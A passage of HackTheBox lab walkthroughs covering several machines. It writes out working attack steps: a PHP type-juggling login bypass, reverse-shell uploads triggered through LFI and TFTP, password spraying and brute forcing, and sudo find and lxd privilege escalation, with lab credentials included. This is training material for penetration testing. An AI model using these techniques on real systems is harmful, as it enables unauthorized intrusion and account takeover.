    gobuster dir -u http://base.htb/login -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/big.txt\n

    Some file and folders uncovered:

    - http://base.htb/_uploaded/\n- http://base.htb/login/\n- http://base.htb/login/login.php\n- http://base.htb/forms/\n- http://base.htb/assets/\n- http://base.htb/logout.php\n

    Under /login there are three files: login.php, config.php and login.php.swp. There are two ways of reading the swap file, with strings and with vim:

    vim -r login.php.swp\n# -r  -- list swap files and exit or recover from a swap file\n
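
    The strings route, for reference:

    strings login.php.swp | less\n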

    Content:

    <?php\nsession_start();\nif (!empty($_POST['username']) && !empty($_POST['password'])) {\n    require('config.php');\n    if (strcmp($username, $_POST['username']) == 0) {\n        if (strcmp($password, $_POST['password']) == 0) {\n            $_SESSION['user_id'] = 1;\n            header(\"Location: /upload.php\");\n        } else {\n            print(\"<script>alert('Wrong Username or Password')</script>\");\n        }\n    } else {\n        print(\"<script>alert('Wrong Username or Password')</script>\");\n    }\n}\n

    Quoting from the article PHP Type Juggling Vulnerabilities: \"When comparing values, always try to use the type-safe comparison operator \u201c===\u201d instead of the loose comparison operator \u201c==\u201d. This will ensure that PHP does not type juggle and the operation will only return True if the types of the two variables also match. This means that (7 === \u201c7\u201d) will return False.\"

    My notes about PHP type juggling.

    In the HackTheBox machine Base, the login form was bypassable by entering an empty array into the username and password parameters:

    Original request\n\n\nPOST /login/login.php HTTP/1.1\nHost: base.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 57\nOrigin: http://base.htb\nConnection: close\nReferer: http://base.htb/login/login.php\nCookie: PHPSESSID=sh4obp53otv54vtsj0g6tev1tt\nUpgrade-Insecure-Requests: 1\n\nusername=admin&password=admin\n
    Crafted request:\n\nPOST /login/login.php HTTP/1.1\nHost: base.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 57\nOrigin: http://base.htb\nConnection: close\nReferer: http://base.htb/login/login.php\nCookie: PHPSESSID=sh4obp53otv54vtsj0g6tev1tt\nUpgrade-Insecure-Requests: 1\n\nusername[]=admin&password[]=admin\n

    How would you know? By spotting the file login.php.swp in the exposed /login directory and reading its contents.
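
    Why the empty array works against this exact code: on PHP 7 and earlier, strcmp() returns NULL (plus a warning) when one of its arguments is an array, and NULL == 0 is true under loose comparison, so both checks pass. A quick local check (a sketch; it needs a PHP 7 CLI, since PHP 8 throws a TypeError instead):

    php -r 'var_dump(strcmp(\"secret\", []) == 0);'\n# bool(true) -> the login check passes\n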

    After sending the request with Burp Suite, grab the PHPSESSID cookie, set it in your browser, and go to http://base.htb/upload.php. Now you can upload the pentesmonkey shell using Burp Suite's Repeater (important note: change the header to \"Content-Type: image/png\"; the file extension may remain .php). Have your netcat listener ready.

    whoami\n
    www-data\n

    Credentials can be found at /var/www/html/login/config.php. Use them to log in as the existing user in /home:

    su john\n# enter password: thisisagoodpassword\n

    Once you are john, you have access to user.txt. Also, to be root:

    id\nsudo -l\n
    john@base:~$ sudo -l\n[sudo] password for john: thisisagoodpassword\n\nMatching Defaults entries for john on base:\n    env_reset, mail_badpass,\n    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin\n\nUser john may run the following commands on base:\n    (root : root) /usr/bin/find\n

    See cheat sheet about suid binaries and:

    sudo find . -exec /bin/sh \\; -quit\n

    Now you are root and can cat /root/root.txt

    ","tags":["walkthrough","php type juggling","reverse shell","suid binary","linux privilege escalation"]},{"location":"htb-crocodile/","title":"Crocodile - A HackTheBox machine","text":"
    nmap -sC -A $ip -Pn\n

    Results:

    PORT   STATE SERVICE VERSION\n21/tcp open  ftp     vsftpd 3.0.3\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to ::ffff:10.10.14.2\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 1\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| -rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist\n|_-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd\n80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))\n|_http-server-header: Apache/2.4.41 (Ubuntu)\n|_http-title: Smash - Bootstrap Business Template\nService Info: OS: Unix\n

    Now we enumerate directories:

    gobuster dir -e -u http://10.129.1.15/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -r \n

    Results:

    ===============================================================\nGobuster v3.5\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http://10.129.1.15/\n[+] Method:                  GET\n[+] Threads:                 20\n[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster/3.5\n[+] Follow Redirect:         true\n[+] Expanded:                true\n[+] Timeout:                 10s\n===============================================================\n2023/05/01 16:21:20 Starting gobuster in directory enumeration mode\n===============================================================\nhttp://10.129.1.15/assets               (Status: 200) [Size: 1703]\nhttp://10.129.1.15/css                  (Status: 200) [Size: 1350]\nhttp://10.129.1.15/js                   (Status: 200) [Size: 1138]\nhttp://10.129.1.15/fonts                (Status: 200) [Size: 1968]\nhttp://10.129.1.15/dashboard            (Status: 200) [Size: 1577]\nhttp://10.129.1.15/server-status        (Status: 403) [Size: 276]\nProgress: 220534 / 220561 (99.99%)\n===============================================================\n2023/05/01 16:29:51 Finished\n===============================================================\n

    At the same time, we explore the FTP service. Anonymous login is allowed.

    ftp 10.129.1.15 \ndir\nmget *\n

    Two files are downloaded.

    cat allowed.userlist\n

    Results:

    aron\npwnmeow\negotisticalsw\nadmin\n

    And passwords:

    cat allowed.userlist.passwd \n

    Results:

    root\nSupersecretpassword1\n@BaASD&9032123sADS\nrKXM59ESxesUFHAd\n

    Now we can log in at http://10.129.1.15/dashboard with the admin credentials. The flag is in the main panel.

    ","tags":["walkthrough"]},{"location":"htb-explosion/","title":"Explosion - A HackTheBox machine","text":"
    nmap -sC -sV $ip -Pn\n
    PORT     STATE SERVICE       VERSION\n135/tcp  open  msrpc         Microsoft Windows RPC\n139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn\n445/tcp  open  microsoft-ds?\n3389/tcp open  ms-wbt-server Microsoft Terminal Services\n| rdp-ntlm-info: \n|   Target_Name: EXPLOSION\n|   NetBIOS_Domain_Name: EXPLOSION\n|   NetBIOS_Computer_Name: EXPLOSION\n|   DNS_Domain_Name: Explosion\n|   DNS_Computer_Name: Explosion\n|   Product_Version: 10.0.17763\n|_  System_Time: 2023-04-27T10:42:37+00:00\n|_ssl-date: 2023-04-27T10:42:45+00:00; 0s from scanner time.\n| ssl-cert: Subject: commonName=Explosion\n| Issuer: commonName=Explosion\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2023-04-26T10:27:02\n| Not valid after:  2023-10-26T10:27:02\n| MD5:   2446e544fced2077f37238e35735b16e\n| SHA-1: cace39c8a8b0ae2a4bf509705cc78f084b9aec0b\n| -----BEGIN CERTIFICATE-----\n| MIIC1jCCAb6gAwIBAgIQadtbfAUkgr5BZjE2eNbcBzANBgkqhkiG9w0BAQsFADAU\n| MRIwEAYDVQQDEwlFeHBsb3Npb24wHhcNMjMwNDI2MTAyNzAyWhcNMjMxMDI2MTAy\n| NzAyWjAUMRIwEAYDVQQDEwlFeHBsb3Npb24wggEiMA0GCSqGSIb3DQEBAQUAA4IB\n| DwAwggEKAoIBAQDSS2eXLWZRkoPS26o641YgH94ZMh9lCyaz2qMPhHsbjNGwZSTC\n| WY+Pm8nAROk5HTTq0CYHWyKZN7I2dONAG42I6pRWdpV3k5NwTj3wCR7BB1WqL5mB\n| CTN7LxfEzngrdU1tPI6FdSkI12I+2h+ckz+2lUaY58+3ENNGe06U82jE8RrEmnFd\n| 0Is0UvA3D3ec2Mzr1Ji8LRko3/rMhggn9T5n75Kh0PstZoRdN+XVjcKfazIfhkZb\n| Wz0/BXcB5fwfSGOWaKcHIL26IviI8DbgS46d4Ydw0tGWE+8BHt3jizillCueg03v\n| TYj4W6d9nqDB1/QmUz9w1tqviUZM7qPCK6qxAgMBAAGjJDAiMBMGA1UdJQQMMAoG\n| CCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsFAAOCAQEANyNIxLXD\n| ftgW+zs+5JGz2WbeLauLLWE3+LJNfMxGWZr9BJAaF4VX0V/dXP3MXLywhqsz+V56\n| mam2jNi44nu4ov+1FgqPKsRdUEb8uOocWEAUE28L48Eh0M09JjVg639REwzqohPV\n| KyqdnHhPkCNH3Js8nJCZkAl6EgWJMWLenD0htNTkJHjtHSR0D3Dyc08WsMPmyOtX\n| m+4Oi8RS7qrHYG0nCvQmJpvNO9eiqYfVVzP5Q06K45hZ/xlVTVePhJFxdVGcc7CH\n| qEILmRdzuvKaRpAD6QocoUm8I3wogOTTV4DcsNOnNSLoFj/TI8i5FV791lZDEzcL\n| bWFK5GD+11kCOw==\n|_-----END CERTIFICATE-----\nService Info: OS: Windows; CPE: cpe:/o:microsoft:windows\n\nHost script results:\n|_clock-skew: mean: 0s, deviation: 0s, median: 0s\n| smb2-security-mode: \n|   311: \n|_    Message signing enabled but not required\n| smb2-time: \n|   date: 2023-04-27T10:42:40\n|_  start_date: N/A\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 37798/tcp): CLEAN (Couldn't connect)\n|   Check 2 (port 6858/tcp): CLEAN (Couldn't connect)\n|   Check 3 (port 35582/udp): CLEAN (Timeout)\n|   Check 4 (port 50597/udp): CLEAN (Failed to receive data)\n|_  0/4 checks are positive: Host is CLEAN or ports are blocked\n

    After going through all open ports, running this nmap script on 3389 gives us interesting results:

    nmap -Pn -sV -p3389 --script rdp-* $ip\n

    The resolution of this machine continues in the port 3389 tricks notes.

    ","tags":["walkthrough"]},{"location":"htb-friendzone/","title":"Walkthrough - Friendzone, a Hack The Box machine","text":"
    nmap -sC -sV $IP -Pn\n
    \u2514\u2500$ nmap -sC -sV $IP -Pn          \nStarting Nmap 7.93 ( https://nmap.org ) at 2023-04-18 18:23 EDT\nStats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan\nService scan Timing: About 14.29% done; ETC: 18:23 (0:00:00 remaining)\nStats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan\nService scan Timing: About 28.57% done; ETC: 18:23 (0:00:00 remaining)\nStats: 0:00:20 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan\nService scan Timing: About 28.57% done; ETC: 18:23 (0:00:15 remaining)\nNmap scan report for 10.129.228.87\nHost is up (0.045s latency).\nNot shown: 993 closed tcp ports (conn-refused)\nPORT    STATE SERVICE     VERSION\n21/tcp  open  ftp         vsftpd 3.0.3\n22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 a96824bc971f1e54a58045e74cd9aaa0 (RSA)\n|   256 e5440146ee7abb7ce91acb14999e2b8e (ECDSA)\n|_  256 004e1a4f33e8a0de86a6e42a5f84612b (ED25519)\n53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)\n| dns-nsid: \n|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu\n80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))\n|_http-server-header: Apache/2.4.29 (Ubuntu)\n|_http-title: Friend Zone Escape software\n139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\n443/tcp open  ssl/http    Apache httpd 2.4.29\n|_http-title: 404 Not Found\n| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO\n| Not valid before: 2018-10-05T21:02:30\n|_Not valid after:  2018-11-04T21:02:30\n|_ssl-date: TLS randomness does not represent time\n|_http-server-header: Apache/2.4.29 (Ubuntu)\n| tls-alpn: \n|_  http/1.1\n445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)\nService Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel\n\nHost script results:\n| smb2-time: \n|   date: 2023-04-18T22:23:28\n|_  start_date: N/A\n|_clock-skew: mean: -59m59s, deviation: 1h43m54s, median: 0s\n| smb2-security-mode: \n|   311: \n|_    Message signing enabled but not required\n| smb-os-discovery: \n|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)\n|   Computer name: friendzone\n|   NetBIOS computer name: FRIENDZONE\\x00\n|   Domain name: \\x00\n|   FQDN: friendzone\n|_  System time: 2023-04-19T01:23:29+03:00\n| smb-security-mode: \n|   account_used: guest\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 35.34 seconds\n

    Interesting here: port 53 open. On port 443 you can read:

    | ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO

    Here we have the domain name friendzone.red. Also, visiting the IP in the browser, there is an info@ email address with the domain friendzoneportal.red.

    Enumerating shares in samba:

    smbclient -L 10.129.228.87\nsmbmap -H 10.129.228.87\n
    An alternative is using enum4linux.

    Checking out each shared folder:

    smbclient \\\\\\\\10.129.228.87\\\\Files\nsmbclient \\\\\\\\10.129.228.87\\\\print$\nsmbclient \\\\\\\\10.129.228.87\\\\general\nsmbclient \\\\\\\\10.129.228.87\\\\Developement\nsmbclient \\\\\\\\10.129.228.87\\\\IPC$\n

    From the general share, inside the smbclient prompt, we can download the file creds.txt:

    dir\nmget *\n
    ","tags":["walkthrough"]},{"location":"htb-friendzone/#transferring-dns-zone","title":"Transferring DNS zone","text":"

    Some HackTheBox machines exploit DNS zone transfers:

    In the case of the Friendzone machine, the web page accessible on port 80 shows an email address in which a different domain can be seen. Port 53 is also open, which is an indicator of a possible DNS zone transfer.

    In Friendzone, we will request a zone transfer for every domain spotted in the different scans:

    # friendzone.red was spotted in the nmap scan. Requesting a zone transfer for friendzone.red from 10.129.228.87\ndig axfr friendzone.red @10.129.228.87\n\n# friendzoneportal.red was spotted in the email shown on http://10.129.228.87. Requesting a zone transfer for friendzoneportal.red:\ndig axfr friendzoneportal.red @10.129.228.87\n

    Add those subdomains to your /etc/hosts

    Visit https://administrator1.friendzone.red and a login panel is displayed. Use the credentials found in the Samba share. After logging into the application, a message is displayed: \"Login Done ! visit /dashboard.php\".

    ","tags":["walkthrough"]},{"location":"htb-funnel/","title":"Walkthrough - A HackTheBox machine - Funnel","text":"

    Enumerate port/services:

    nmap -sV -sC $ip -Pn -p-\n

    Open ports: 21 and 22.

    We can log into FTP as the anonymous user:

    ftp $ip\n# enter user when prompted: anonymous\n# Press enter when prompted for password.\n

    In the ftp service there is a directory, mail_backup.

    cd mail_backup\nmget *\n

    Get the users from the file welcome_28112022:

    • optimus@funnel.htb
    • albert@funnel.htb
    • andreas@funnel.htb
    • christine@funnel.htb
    • maria@funnel.htb

    Get default password from file password_policy.pdf: \"funnel123#!#\".

    You can spray the default password with hydra, or try each user manually. The user that still has it is christine.
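
    A sketch of the hydra spray (users.txt holding the five usernames above):

    hydra -L users.txt -p 'funnel123#!#' ssh://$ip\n

    Then log in: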

    sshpass -p 'funnel123#!#' ssh christine@10.129.228.102\n

    Now we can enumerate socket connections with the command \"ss\"

    ss -tl\n#-l: Display only listening sockets.\n#-t: Display TCP sockets.\n

    Results:

    State  Recv-Q Send-Q Local Address:Port       Peer Address:PortProcess \nLISTEN 0      4096   127.0.0.53%lo:domain          0.0.0.0:*           \nLISTEN 0      128          0.0.0.0:ssh             0.0.0.0:*           \nLISTEN 0      4096       127.0.0.1:postgresql      0.0.0.0:*           \nLISTEN 0      4096       127.0.0.1:33599           0.0.0.0:*           \nLISTEN 0      32                 *:ftp                   *:*           \nLISTEN 0      128             [::]:ssh                [::]:* \n

    PostgreSQL is in use. Since our user is not in the sudoers file and cannot install a postgres client on the target, we can work around this via port forwarding.

    If the tool is not installed, run this on the attacker machine:

    sudo apt install postgresql-client-common\n

    1. In the attacking machine:

    ssh UserNameInTheAttackedMachine@IPOfTheAttackedMachine -L 1234:localhost:5432 \n# We listen for incoming connections on our local port 1234. When a client connects to it, the SSH client forwards the traffic through the tunnel, and the remote server delivers it to localhost:5432, where PostgreSQL is listening. This allows the local client to access the remote service as if it were running on the local machine.\n# We are forwarding traffic from a local port of our choosing, 1234, to the port on which PostgreSQL is listening, namely 5432, on the remote server. We therefore specify port 1234 to the left of localhost, and 5432 to the right, indicating the target port.\n

    2. In another terminal in the attacking machine:

    sudo apt update && sudo apt install postgresql postgresql-client-common \n# this will install postgresql in case you don't have it.\n\npsql -U christine -h localhost -p 1234\n# Using our installation of psql, we can now interact with the PostgreSQL service running locally on the target machine:\n# -U: to specify user.\n# -h: to specify localhost. \n# -p 1234 as we are targeting the tunnel we created earlier with SSH, we need to specify which is the port the tunnel is listening on.\n

    Once logged in, use postgresql cheat sheet to get the flag.

    ","tags":["walkthrough","postgresql","ftp"]},{"location":"htb-ignition/","title":"Ignition, a Hack The Box Machine","text":"
    nmap -sC -sV $ip -Pn\n

    Adding ignition.htb to /etc/hosts

    Enumerating:

    gobuster dir -u http://ignition.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 40\n

    Browsing found files and gathering information:

    /home                 (Status: 200) [Size: 25802]\n/contact              (Status: 200) [Size: 28673]\n/media                (Status: 301) [Size: 185] [--> http://ignition.htb/media/]\n/0                    (Status: 200) [Size: 25803]\n/static               (Status: 301) [Size: 185] [--> http://ignition.htb/static/]\n/catalog              (Status: 302) [Size: 0] [--> http://ignition.htb/]\n/admin                (Status: 200) [Size: 7095]\n/Home                 (Status: 301) [Size: 0] [--> http://ignition.htb/home]\n/setup                (Status: 301) [Size: 185] [--> http://ignition.htb/setup/]\n/checkout             (Status: 302) [Size: 0] [--> http://ignition.htb/checkout/cart/]\n/robots               (Status: 200) [Size: 1]\n/wishlist             (Status: 302) [Size: 0] [--> http://ignition.htb/customer/account/login/referer/aHR0cDovL2lnbml0aW9uLmh0Yi93aXNobGlzdA%2C%2C/]    \n/soap                 (Status: 200) [Size: 391]\n

    Knowing this we could do a more precise enumeration with:

    gobuster dir -u http://ignition.htb -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/CMS/sitemap-magento.txt  \n

    From /admin we get to a login panel of a Magento application. From /setup we obtain the Magento version: Version dev-2.4-develop.

    Brute forcing it:

    wfuzz -c -z file,/usr/share/wordlists/SecLists-master/Passwords/Common-Credentials/10-million-password-list-top-100000.txt -d \"login%5Busername%5D=admin&login%5Bpassword%5D=FUZZ\" http://ignition.htb/admin\n# add --hh <chars> to hide responses with the length of a failed login, so only the hit stands out\n

    Log in at /admin with those credentials. The flag is in the dashboard.

    ","tags":["walkthrough"]},{"location":"htb-included/","title":"Included - A HackTheBox machine","text":"

    After running a port scan, the only open port is 80.

    nmap -sC -sV $ip -Pn -p-\n

    Results:

    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))\n|_http-server-header: Apache/2.4.29 (Ubuntu)\n| http-title: Site doesn't have a title (text/html; charset=UTF-8).\n|_Requested resource was http://10.129.95.185/?file=home.php\n

    After visiting the site in the browser and examining its code, we see it's a simple PHP website. The endpoint that appears in the scan has an LFI vulnerability, and some files can be read.

    Burpsuite request:

    GET /?file=../../../../../../etc/passwd HTTP/1.1\nHost: 10.129.95.185\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\n

    Result:

    HTTP/1.1 200 OK\nDate: Mon, 08 May 2023 07:04:13 GMT\nServer: Apache/2.4.29 (Ubuntu)\nVary: Accept-Encoding\nContent-Length: 1575\nConnection: close\nContent-Type: text/html; charset=UTF-8\n\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin\nsyslog:x:102:106::/home/syslog:/usr/sbin/nologin\nmessagebus:x:103:107::/nonexistent:/usr/sbin/nologin\n_apt:x:104:65534::/nonexistent:/usr/sbin/nologin\nlxd:x:105:65534::/var/lib/lxd/:/bin/false\nuuidd:x:106:110::/run/uuidd:/usr/sbin/nologin\ndnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin\nlandscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin\npollinate:x:109:1::/var/cache/pollinate:/bin/false\nmike:x:1000:1000:mike:/home/mike:/bin/bash\ntftp:x:110:113:tftp daemon,,,:/var/lib/tftpboot:/usr/sbin/nologin\n
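
    For reference, the same probe works as a one-liner from the command line:

    curl 'http://10.129.95.185/?file=../../../../../../etc/passwd'\n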

    Something interesting is that after user mike, there is a service/user: tftp. Trivial File Transfer Protocol (TFTP) is a simple protocol that provides basic file transfer function with no user authentication. TFTP is intended for applications that do not need the sophisticated interactions that File Transfer Protocol (FTP) provides. It is also revealed that TFTP uses the User Datagram Protocol (UDP) to communicate. This is defined as a lightweight data transport protocol that works on top of IP.

    UDP provides a mechanism to detect corrupt data in packets, but it does not attempt to solve other problems, such as lost or out-of-order packets. It is implemented in the transport layer of the OSI model and is known as a fast but unreliable protocol, unlike TCP, which is reliable but slower than UDP. Just as TCP has ports for protocols such as HTTP, FTP and SSH, UDP has ports for the protocols that run over it.

    sudo nmap -sU 10.129.95.185   \n

    You can use Metasploit or Python to check whether you can upload/download files; see the module auxiliary/admin/tftp/tftp_transfer_util.

    You can also exploit it manually. Install a TFTP client:

    # Install tftp client\nsudo apt install tftp\n

    Also, check the manual for the available commands:

    man tftp\n

    Upload your pentesmonkey shell with:

    tftp 10.129.95.185\nput pentesmonkey.php\n

    Where does it get uploaded? It depends, but the default configuration file for tftpd-hpa is /etc/default/tftpd-hpa, and the upload directory is configured there under the parameter TFTP_DIRECTORY=. With that information, you can reach the uploaded file and launch your reverse shell.

    Let's do it. The request in Burp Suite:

    GET /?file=../../../../../../etc/default/tftpd-hpa HTTP/1.1\nHost: 10.129.95.185\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\n

    Response:

    HTTP/1.1 200 OK\nDate: Mon, 08 May 2023 07:27:32 GMT\nServer: Apache/2.4.29 (Ubuntu)\nVary: Accept-Encoding\nContent-Length: 125\nConnection: close\nContent-Type: text/html; charset=UTF-8\n\n# /etc/default/tftpd-hpa\n\nTFTP_USERNAME=\"tftp\"\nTFTP_DIRECTORY=\"/var/lib/tftpboot\"\nTFTP_ADDRESS=\":69\"\nTFTP_OPTIONS=\"-s -l -c\"\n

    Now, open a netcat listener in one terminal:

    nc -lnvp 1234\n

    Trigger the shell by visiting this URL in the browser:

    http://10.129.95.185/?file=../../../../../../var/lib/tftpboot/pentesmonkey.php\n

    Upgrade to an interactive shell:

    SHELL=/bin/bash script -q /dev/null\nCtrl-Z\nstty raw -echo\nfg\nreset\nxterm\n

    Browse around. Credentials for user mike are at /var/www/html/.htpasswd:

    su mike\n# Enter password: Sheffield19\n

    And get the user.txt flag:

    cd\nls -la\ncat user.txt\n
    ","tags":["walkthrough","lxd exploitation","port 69","tftp","privilege escalation"]},{"location":"htb-included/#privilege-escalation","title":"Privilege escalation","text":"
    whoami\npwd\nid\ngroups\nuname -a\nlsb_release -a\n

    Information retrieved:

    uid=1000(mike) gid=1000(mike) groups=1000(mike),108(lxd)\ngroups\nmike lxd\nuname -a\nLinux included 4.15.0-151-generic #157-Ubuntu SMP Fri Jul 9 23:07:57 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux\nNo LSB modules are available.\nDistributor ID: Ubuntu\nDescription:    Ubuntu 18.04.5 LTS\nRelease:        18.04\nCodename:       bionic\n

    Searching for \"exploit ubuntu 18.04.5 LTS\" turns up an exploit that abuses the lxd service, which makes sense given the group membership retrieved above. More about lxd privilege escalation.

    LXD is a root process that carries out actions for anyone with write access to the LXD UNIX socket. It often does not attempt to match the privileges of the calling user. There are multiple methods to exploit this.

    Basically, as mike we belong to group lxd. Let's exploit this:

    Steps to be performed on the attacker machine:

    # Download build-alpine in your local machine through the git repository:\ngit clone https://github.com/saghul/lxd-alpine-builder.git\n\n# Execute the script \u201cbuild -alpine\u201d that will build the latest Alpine image as a compressed file, this step must be executed by the root user.\ncd lxd-alpine-builder\nsudo ./build-alpine\n\n# This will generate a tar file that you need to transfer to the victim machine. For that you can copy that file to your /var/www/html folder and start apache2 service.\n

    Steps to be performed on the victim machine:

    # Download the alpine image. Go for instance to the /tmp folder and, if you have started the apache2 service in the attacker machine, do a wget:\nwget http://AtackerIP//alpine-v3.17-x86_64-20230508_0532.tar.gz\n\n# After the image is built it can be added as an image to LXD as follows:\nlxc image import ./alpine-v3.17-x86_64-20230508_0532.tar.gz --alias myimage\n\n# List available images:\nlxc image list\n\n# Initiate your image inside a new container\nlxc init myimage ignite -c security.privileged=true\n\n# Mount the container inside the /root directory\nlxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true\n\n# Initialize the container\nlxc start ignite\n\n# Launch a shell command in the container\nlxc exec ignite /bin/sh\n

    Now, we should be root:

    whoami\ncd /\nfind . -name root.txt 2>/dev/null\n
    ","tags":["walkthrough","lxd exploitation","port 69","tftp","privilege escalation"]},{"location":"htb-lame/","title":"HTB Lame","text":"
    # Reconnaissance\nnmap -sC -sV $IP -Pn\n
    PORT    STATE SERVICE     VERSION\n21/tcp  open  ftp         vsftpd 2.3.4\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to 10.10.14.2\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      vsFTPd 2.3.4 - secure, fast, stable\n|_End of status\n|_ftp-anon: Anonymous FTP login allowed (FTP code 230)\n22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)\n| ssh-hostkey: \n|   1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA)\n|_  2048 5656240f211ddea72bae61b1243de8f3 (RSA)\n139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\n445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)\nService Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel\n\nHost script results:\n|_clock-skew: mean: 2h00m28s, deviation: 2h49m43s, median: 27s\n| smb-os-discovery: \n|   OS: Unix (Samba 3.0.20-Debian)\n|   Computer name: lame\n|   NetBIOS computer name: \n|   Domain name: hackthebox.gr\n|   FQDN: lame.hackthebox.gr\n|_  System time: 2023-04-18T17:35:18-04:00\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 25444/tcp): CLEAN (Timeout)\n|   Check 2 (port 29825/tcp): CLEAN (Timeout)\n|   Check 3 (port 9648/udp): CLEAN (Timeout)\n|   Check 4 (port 21091/udp): CLEAN (Timeout)\n|_  0/4 checks are positive: Host is CLEAN or ports are blocked\n|_smb2-time: 